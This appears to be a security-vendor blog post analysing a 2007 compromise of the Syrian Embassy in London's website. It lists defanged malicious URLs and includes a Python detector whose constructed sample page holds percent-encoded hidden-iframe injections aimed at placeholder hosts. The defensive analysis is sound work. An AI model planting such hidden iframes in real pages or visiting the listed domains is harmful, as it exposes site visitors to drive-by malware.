This is to confirm a report from Websense about the compromised official website of the Syrian Embassy in London. Indeed, there are three obfuscated iframes found on the site.
The following is a sample obfuscated script found in the compromised page:
Deobfuscating the said scripts we get the following URLs:
- hxxp://0ki.ru{blocked}/index.php
- hxxp://sicil.info{blocked}/index.php
- hxxp://x12345.or/{blocked}ounter.php?out=1189360677 (a zero-byte file)
Initial analysis of the first URL suggests that it accepts a country code as an argument, so country checking is most probably employed. This is already detected as JS_PSYME.ANT. The second URL contains another iframe, which leads to a URL hosting the exploit kit (most probably Icepack). The exploit kit employs OS detection and web browser detection, and contains several exploits targeting web browsers and web browser plug-ins. It will try to exploit several vulnerabilities to download and execute a file, detected as TROJ_SMALL.KYZ. The exploit kit itself is detected as JS_PSYME.ADQ.
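The kind of injection described above (a `document.write(unescape(...))` call that expands into a hidden iframe at page load) can be surfaced without executing the script. The following is an added example written for this post, not the script recovered from the embassy site and not Trend Micro code: it statically decodes `unescape()`-obfuscated `document.write` payloads, extracts every iframe source, and flags those that are hidden (0x0 or `display:none`) or that only appear after decoding. The HTML sample and the `.invalid` hostnames in it are constructed placeholders, and the hiding heuristics are the author's assumptions, not a complete detection rule.

```python
import html
import re
from urllib.parse import unquote

# Constructed sample page (not the real compromised page). The injected
# scripts percent-encode an <iframe> and rely on unescape() at runtime so
# the tag never appears literally in the HTML source. Hostnames are
# placeholders in the reserved .invalid TLD.
CONSTRUCTED_PAGE = r'''
<html><body>
<h1>Embassy news</h1>
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Fexample-redirector.invalid%2Findex.php%22%20width%3D0%20height%3D0%3E%3C%2Fiframe%3E'))</script>
<script>document.write(unescape("%3Ciframe%20src%3D%27http%3A%2F%2Fexample-kit.invalid%2Fcounter.php%3Fout%3D42%27%20style%3D%27display%3Anone%27%3E%3C%2Fiframe%3E"))</script>
<iframe src="http://example-legit.invalid/widget" width=300 height=200></iframe>
</body></html>
'''

# document.write(unescape('<percent-encoded payload>')) with either quote style.
DOCWRITE_UNESCAPE = re.compile(
    r'''document\.write\(\s*unescape\(\s*(['"])(.*?)\1\s*\)\s*\)''', re.S)
IFRAME_TAG = re.compile(r"<iframe\b([^>]*)>", re.I)
# name="v", name='v' or bare name=v
ATTR = re.compile(r'''(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))''')


def js_unescape(s):
    """Mimic JavaScript unescape(): decode %uXXXX first, then %XX sequences."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s)


def decode_document_writes(page):
    """Replace each document.write(unescape(...)) with the HTML it would emit."""
    return DOCWRITE_UNESCAPE.sub(lambda m: js_unescape(m.group(2)), page)


def parse_attrs(attr_text):
    """Parse the attribute list of a tag into a lower-cased name -> value dict."""
    attrs = {}
    for m in ATTR.finditer(attr_text):
        attrs[m.group(1).lower()] = next(v for v in m.groups()[1:] if v is not None)
    return attrs


def is_hidden(attrs):
    """Heuristic (assumption): a 0x0 iframe or one styled as invisible is hidden."""
    def zero(v):
        return v is not None and v.strip().rstrip("px").strip() in ("0", "0.0")
    style = attrs.get("style", "").replace(" ", "").lower()
    return (zero(attrs.get("width")) and zero(attrs.get("height"))) \
        or "display:none" in style or "visibility:hidden" in style


def find_iframes(page):
    """List every iframe in the page after static deobfuscation.

    Each entry records the src, whether the frame is hidden, and whether the
    tag only exists after decoding (i.e. it was obfuscated in the source).
    """
    decoded = decode_document_writes(page)
    found = []
    for m in IFRAME_TAG.finditer(decoded):
        attrs = parse_attrs(m.group(1))
        found.append({
            "src": html.unescape(attrs.get("src", "")),
            "hidden": is_hidden(attrs),
            "obfuscated": m.group(0) not in page,
        })
    return found


def suspicious_urls(page):
    """Sources of iframes that are hidden or obfuscated: the ones to block/triage."""
    return [f["src"] for f in find_iframes(page) if f["hidden"] or f["obfuscated"]]


if __name__ == "__main__":
    for frame in find_iframes(CONSTRUCTED_PAGE):
        print(frame)
    print("suspicious:", suspicious_urls(CONSTRUCTED_PAGE))
```

Running the module prints one record per iframe; on the constructed sample the two decoded frames come out as hidden and obfuscated while the literal 300x200 frame does not. Decoding statically rather than in a browser keeps the analyst's machine away from the redirector chain and the exploit kit behind it; the extracted URLs are what go into the blocklist submission.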

The third URL just contains a zero-byte file. The malicious files are already being processed and the malicious URLs are submitted for blocking.

October 20th, 2007 at 11:58 am
[...] many sites, some even governmental or belonging to banks, were "hacked". Resources: Another Government Website Hacked - TrendLabs | Malware Blog - by Trend Micro Dancho Danchev - Mind Streams of Information Security Knowledge: Syrian Embassy in London Serving [...]